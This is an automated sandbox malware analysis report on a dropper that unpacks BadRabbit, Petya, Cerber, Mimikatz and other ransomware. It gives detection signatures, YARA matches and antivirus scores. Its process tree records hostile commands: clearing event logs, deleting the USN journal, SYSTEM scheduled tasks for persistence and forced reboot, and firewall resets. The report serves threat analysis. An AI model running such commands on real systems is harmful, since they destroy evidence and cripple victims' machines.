Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1jDe7zWnoe.exe

Overview

General Information

Sample Name:1jDe7zWnoe.exe
Analysis ID:712615
MD5:3ce563e899291b59fa8c57c98cad9b4e
SHA1:7157cc9cf910735727b6601ad4d532cdd0fedc7e
SHA256:4a8031fc97753e95eb440a1f0f100ddcfbca0bca0bb2271dbc775e129282f304
Tags:exeNabucurRansomware
Infos:

Detection

Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, Petya, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected DeriaLock Ransomware
Found ransom note / readme
Yara detected Babuk Ransomware
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Petya ransomware
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Cerber ransomware
Antivirus / Scanner detection for submitted sample
Yara detected Mimikatz
Multi AV Scanner detection for dropped file
Yara detected InfinityLock Ransomware
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Writes directly to the primary disk partition (DR0)
Contains functionality to register hotkeys which are used to close and control applications (CTRL-ALT-DEL, ALT-F4 etc)
Found Tor onion address
Deletes keys related to Windows Defender
PE file has a writeable .text section
Deletes keys which are related to windows safe boot (disables safe mode boot)
Tries to evade debugger and weak emulator (self modifying code)
Clears the journal log
Machine Learning detection for sample
Clears the windows event log
Performs an instant shutdown (NtRaiseHardError)
Writes many files with high entropy
Connects to many different private IPs (likely to spread or exploit)
Tries to detect virtualization through RDTSC time measurements
Disables the Windows registry editor (regedit)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to create processes via WMI
Drops PE files with benign system names
Opens network shares
Disables Windows system restore
Contains functionality to enumerate network shares of other devices
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Office process tries to detect installed antivirus files
Disables the Windows task manager (taskmgr)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Infects the VBR (Volume Boot Record) of the hard disk
May use the Tor software to hide its network traffic
Modifies the windows firewall
Deletes shadow drive data (may be related to ransomware)
Connects to many different private IPs via SMB (likely to spread or exploit)
Infects the boot sector of the hard disk
Found evasive API chain (may stop execution after checking computer name)
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Creates a start menu entry (Start Menu\Programs\Startup)
Uses reg.exe to modify the Windows registry
Checks for available system drives (often done to infect USB drives)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Changes the start page of internet explorer
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
PE file contains sections with non-standard names
Hides icons from the desktop
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Changes the window title of internet explorer
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Enables security privileges
Uses taskkill to terminate processes
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

  • System is w10x64
  • 1jDe7zWnoe.exe (PID: 5912 cmdline: "C:\Users\user\Desktop\1jDe7zWnoe.exe" MD5: 3CE563E899291B59FA8C57C98CAD9B4E)
    • Endermanch@BadRabbit.exe (PID: 4884 cmdline: "C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
      • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 5496 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • cmd.exe (PID: 1536 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 4952 cmdline: schtasks /Delete /F /TN rhaegal MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 2792 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2112656973 && exit" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 5716 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2112656973 && exit" MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 5300 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:06:00 MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 6132 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:06:00 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • EF39.tmp (PID: 1276 cmdline: "C:\Windows\EF39.tmp" \\.\pipe\{96A4BC70-5646-4F34-828D-297F35E216CA} MD5: 347AC3B6B791054DE3E5720A7144A977)
          • conhost.exe (PID: 5200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 7368 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 8340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • wevtutil.exe (PID: 9328 cmdline: wevtutil cl Setup MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • wevtutil.exe (PID: 9432 cmdline: wevtutil cl System MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • wevtutil.exe (PID: 6372 cmdline: wevtutil cl Security MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • wevtutil.exe (PID: 13024 cmdline: wevtutil cl Application MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • fsutil.exe (PID: 13096 cmdline: fsutil usn deletejournal /D C: MD5: 140A43A2237D7D7497D4E0568B518B71)
        • cmd.exe (PID: 9376 cmdline: /c schtasks /Delete /F /TN drogon MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 9416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 10284 cmdline: schtasks /Delete /F /TN drogon MD5: 15FF7D8324231381BAD48A052F85DF04)
    • Endermanch@Birele.exe (PID: 4924 cmdline: "C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)
      • taskkill.exe (PID: 5440 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@Cerber5.exe (PID: 5460 cmdline: "C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe" MD5: FE1BC60A95B2C2D77CD5D232296A7FA4)
      • netsh.exe (PID: 3216 cmdline: C:\Windows\system32\netsh.exe advfirewall set allprofiles state on MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 3208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5688 cmdline: C:\Windows\system32\netsh.exe advfirewall reset MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 13128 cmdline: "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 13144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 13176 cmdline: taskkill /f /im "E" MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • PING.EXE (PID: 13212 cmdline: ping -n 1 127.0.0.1 MD5: 70C24A306F768936563ABDADB9CA9108)
    • Endermanch@DeriaLock.exe (PID: 4632 cmdline: "C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe" MD5: 0A7B70EFBA0AA93D4BC0857B87AC2FCB)
    • Fantom.exe (PID: 5520 cmdline: "C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe" MD5: 7D80230DF68CCBA871815D68F016C282)
    • Endermanch@InfinityCrypt.exe (PID: 5312 cmdline: "C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe" MD5: B805DB8F6A84475EF76B795B0D1ED6AE)
    • Endermanch@Krotten.exe (PID: 7328 cmdline: "C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exe" MD5: 87CCD6F4EC0E6B706D65550F90B0E3C7)
    • Endermanch@NoMoreRansom.exe (PID: 8332 cmdline: "C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe" MD5: 63210F8F1DDE6C40A7F3643CCF0FF313)
    • Endermanch@Petya.A.exe (PID: 11252 cmdline: "C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe" MD5: AF2379CC4D607A45AC44D62135FB7015)
    • Endermanch@PolyRansom.exe (PID: 13136 cmdline: "C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe" MD5: 3ED3FB296A477156BC51ABA43D825FC0)
      • dekAkckQ.exe (PID: 13264 cmdline: C:\Users\user\fakAAcAY\dekAkckQ.exe MD5: 327F75561227DE039329A625537B56A2)
      • LOAcQQUU.exe (PID: 4488 cmdline: C:\ProgramData\vsMwMYIk\LOAcQQUU.exe MD5: 0D6D628F4EAEA4532B8F79E83D4CF413)
      • cmd.exe (PID: 1944 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Endermanch@PolyRansom.exe (PID: 1324 cmdline: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom MD5: 3ED3FB296A477156BC51ABA43D825FC0)
      • reg.exe (PID: 2680 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1 MD5: CEE2A7E57DF2A159A065A34913A055C2)
    • Endermanch@WinlockerVB6Blacksod.exe (PID: 13256 cmdline: "C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe" MD5: DBFBF254CFB84D991AC3860105D66FC6)
  • svchost.exe (PID: 6016 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6040 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6092 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3092 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3928 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5168 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3592 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5280 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cmd.exe (PID: 5800 cmdline: C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 2112656973 && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • dispci.exe (PID: 7312 cmdline: "C:\Windows\dispci.exe" -id 2112656973 MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)
      • conhost.exe (PID: 9424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 13248 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 4556 cmdline: schtasks /Delete /F /TN rhaegal MD5: 15FF7D8324231381BAD48A052F85DF04)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.execerber3Cerber3 pekeinfo
  • 0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeJoeSecurity_infinitylockYara detected InfinityLock RansomwareJoe Security
    C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeMALWARE_Win_InfinityLockDetects InfinityLock ransomwareditekSHen
    • 0x2c145:$s3: GenerateHWID
    • 0x2c2c3:$s4: CreateKey
    • 0x2c1b6:$d1: ProgrammFiles
    • 0x2c1ad:$d2: OneDrive
    • 0x2c184:$d3: ProgrammsX86
    • 0x2c1a4:$d4: UserDirs
    • 0x2c1dd:$d5: B_Drive
    • 0x2e834:$pdb1: F:\DESKTOP!\ChkDsk\ChkDsk\obj\
    • 0x2e846:$pdb2: \ChkDsk\obj\Debug\PremiereCrack.pdb
    C:\Windows\dispci.exeBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
    • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST
    • 0x14430:$x4: C:\Windows\cscc.dat
    • 0x1b1bd:$s1: need to do is submit the payment and get the decryption password.
    • 0x1f30d:$s1: need to do is submit the payment and get the decryption password.
    • 0x14500:$s2: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
    • 0x1b53f:$s5: Run DECRYPT app at your desktop after system boot
    • 0x1f68f:$s5: Run DECRYPT app at your desktop after system boot
    • 0x146ca:$s6: Files decryption completed
    • 0x145ea:$s7: Disable your anti-virus and anti-malware programs
    C:\Windows\dispci.exesig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93Bad Rabbit RansomwareChristiaan Beek
    • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
    • 0x1b1bd:$x2: need to do is submit the payment and get the decryption password.
    • 0x1f30d:$x2: need to do is submit the payment and get the decryption password.
    • 0x1b40a:$s3: If you have already got the password, please enter it below.
    • 0x1f55a:$s3: If you have already got the password, please enter it below.
    • 0x2130c:$s4: dispci.exe
    • 0x14500:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
    • 0x1b53f:$s6: Run DECRYPT app at your desktop after system boot
    • 0x1f68f:$s6: Run DECRYPT app at your desktop after system boot
    • 0x147b8:$s7: Enter password#1:
    • 0x14676:$s8: Enter password#2:
    • 0x14430:$s9: C:\Windows\cscc.dat
    • 0x14940:$s10: schtasks /Delete /F /TN %ws
    • 0x1b448:$s11: Password#1:
    • 0x1f598:$s11: Password#1:
    • 0x14398:$s12: \AppData
    • 0x14650:$s13: Readme.txt
    • 0x14752:$s14: Disk decryption completed
    • 0x146ca:$s15: Files decryption completed
    • 0x212b4:$s16: http://diskcryptor.net/
    • 0x1b235:$s17: Your personal installation key#1:
    Click to see the 10 entries
    SourceRuleDescriptionAuthorStrings
    0000002F.00000000.350343417.0000000000401000.00000020.00000001.01000000.00000015.sdmpRansom_PetyaRegla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015CCN-CERT
    • 0x19c37:$a1: C1 C8 14 2B F0 03 F0 2B F0 03 F0 C1 C0 14 03 C2
    • 0x19c47:$a2: 46 F7 D8 81 EA 5A 93 F0 12 F7 DF C1 CB 10 81 F6
    • 0x19c57:$a3: 0C 88 B9 07 87 C6 C1 C3 01 03 C5 48 81 C3 A3 01 00 00
    0000001D.00000000.318134317.0000000000813000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_infinitylockYara detected InfinityLock RansomwareJoe Security
      0000000D.00000000.307768688.0000000000448000.00000020.00000001.01000000.00000009.sdmpcerber3Cerber3 pekeinfo
      • 0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
      0000000C.00000003.314263722.0000000004A41000.00000004.00000800.00020000.00000000.sdmpsig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93Bad Rabbit RansomwareChristiaan Beek
      • 0x138e8:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
      • 0x1a205:$x2: need to do is submit the payment and get the decryption password.
      • 0x1e355:$x2: need to do is submit the payment and get the decryption password.
      • 0x1a452:$s3: If you have already got the password, please enter it below.
      • 0x1e5a2:$s3: If you have already got the password, please enter it below.
      • 0x20354:$s4: dispci.exe
      • 0x13548:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
      • 0x1a587:$s6: Run DECRYPT app at your desktop after system boot
      • 0x1e6d7:$s6: Run DECRYPT app at your desktop after system boot
      • 0x13800:$s7: Enter password#1:
      • 0x136be:$s8: Enter password#2:
      • 0x13478:$s9: C:\Windows\cscc.dat
      • 0x13988:$s10: schtasks /Delete /F /TN %ws
      • 0x1a490:$s11: Password#1:
      • 0x1e5e0:$s11: Password#1:
      • 0x133e0:$s12: \AppData
      • 0x13698:$s13: Readme.txt
      • 0x1379a:$s14: Disk decryption completed
      • 0x13712:$s15: Files decryption completed
      • 0x202fc:$s16: http://diskcryptor.net/
      • 0x1a27d:$s17: Your personal installation key#1:
      0000001F.00000000.322395857.00007FF64E9AE000.00000008.00000001.01000000.00000010.sdmpmimikatzmimikatzBenjamin DELPY (gentilkiwi)
      • 0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74
      • 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74
      • 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
      Click to see the 27 entries
      SourceRuleDescriptionAuthorStrings
      13.0.Endermanch@Cerber5.exe.400000.0.unpackcerber3Cerber3 pekeinfo
      • 0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
      12.3.rundll32.exe.3073250.1.unpackINDICATOR_TOOL_ENC_DiskCryptorDetect DiskCryptor open encryption solution that offers encryption of all disk partitionsditekSHen
      • 0x2a1d8:$d1: \DosDevices\dcrypt
      • 0x2a288:$d2: $dcsys$_fail_%x
      • 0x2a268:$d3: %s\$DC_TRIM_%x$
      • 0x2a1b8:$d4: \Device\dcrypt
      • 0x2a220:$d5: %s\$dcsys$
      31.0.EF39.tmp.7ff64e9a0000.0.unpackBadRabbit_Mimikatz_CompAuto-generated ruleFlorian Roth
      • 0xa848:$s1: %lS%lS%lS:%lS
      • 0xa440:$s2: lsasrv
      • 0xa868:$s3: CredentialKeys
      • 0xa878:$s4: 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00
      31.0.EF39.tmp.7ff64e9a0000.0.unpackmimikatzmimikatzBenjamin DELPY (gentilkiwi)
      • 0xcaa8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74
      • 0xcab8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74
      • 0xca68:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
      31.0.EF39.tmp.7ff64e9a0000.0.unpackJoeSecurity_Mimikatz_2Yara detected MimikatzJoe Security
        Click to see the 65 entries

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe, ParentProcessId: 4884, ParentProcessName: Endermanch@BadRabbit.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ProcessId: 5496, ProcessName: rundll32.exe
        Timestamp:192.168.2.354.242.4.10149772802849813 09/29/22-14:50:03.652241
        SID:2849813
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.354.242.4.10149772802849814 09/29/22-14:50:03.652241
        SID:2849814
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.393.107.12.06552368932023619 09/29/22-14:48:40.474898
        SID:2023619
        Source Port:65523
        Destination Port:6893
        Protocol:UDP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.53.177.5349787802809804 09/29/22-14:50:12.037893
        SID:2809804
        Source Port:49787
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeAvira: detection malicious, Label: HEUR/AGEN.1227089
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeAvira: detection malicious, Label: TR/Ransom.pfnaw
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeAvira: detection malicious, Label: HEUR/AGEN.1240493
        Source: C:\Users\user\AppData\Local\Temp\1q3rmbaq.p1f\Endermanch@AntivirusPro2017.exeAvira: detection malicious, Label: TR/AD.FakeRean.mwfxa
        Source: C:\Users\user\AppData\Local\Temp\WindowsUpdate.exeAvira: detection malicious, Label: TR/Ficongur.dngqe
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
        Source: C:\ProgramData\Windows\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1240493
        Source: C:\Users\user\AppData\Local\Temp\ca1jm2wg.yla\Endermanch@HappyAntivirus.exeAvira: detection malicious, Label: PUA/HappyAV.A
        Source: C:\Users\user\AppData\Local\Temp\bsejfx0c.zjs\Endermanch@ViraLock.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeAvira: detection malicious, Label: TR/AD.HiddenTear.huakh
        Source: 1jDe7zWnoe.exeReversingLabs: Detection: 64%
        Source: 1jDe7zWnoe.exeVirustotal: Detection: 52%Perma Link
        Source: 1jDe7zWnoe.exeMetadefender: Detection: 29%Perma Link
        Source: 1jDe7zWnoe.exeAvira: detected
        Source: C:\ProgramData\Windows\csrss.exeReversingLabs: Detection: 90%
        Source: C:\ProgramData\Windows\csrss.exeMetadefender: Detection: 72%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeReversingLabs: Detection: 87%
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeMetadefender: Detection: 65%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeReversingLabs: Detection: 85%
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeMetadefender: Detection: 60%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeReversingLabs: Detection: 90%
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeMetadefender: Detection: 72%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\1q3rmbaq.p1f\Endermanch@AntivirusPro2017.exeReversingLabs: Detection: 92%
        Source: C:\Users\user\AppData\Local\Temp\1q3rmbaq.p1f\Endermanch@AntivirusPro2017.exeMetadefender: Detection: 64%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeReversingLabs: Detection: 90%
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeMetadefender: Detection: 75%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\WindowsUpdate.exeReversingLabs: Detection: 62%
        Source: C:\Users\user\AppData\Local\Temp\WindowsUpdate.exeMetadefender: Detection: 45%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\bsejfx0c.zjs\Endermanch@ViraLock.exeReversingLabs: Detection: 95%
        Source: C:\Users\user\AppData\Local\Temp\bsejfx0c.zjs\Endermanch@ViraLock.exeMetadefender: Detection: 82%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\ca1jm2wg.yla\Endermanch@HappyAntivirus.exeReversingLabs: Detection: 36%
        Source: C:\Users\user\AppData\Local\Temp\ca1jm2wg.yla\Endermanch@HappyAntivirus.exeMetadefender: Detection: 36%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeReversingLabs: Detection: 95%
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeMetadefender: Detection: 81%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeReversingLabs: Detection: 92%
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeMetadefender: Detection: 68%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\hntwffjp.nvh\Endermanch@Antivirus.exeReversingLabs: Detection: 85%
        Source: C:\Users\user\AppData\Local\Temp\hntwffjp.nvh\Endermanch@Antivirus.exeMetadefender: Detection: 60%Perma Link
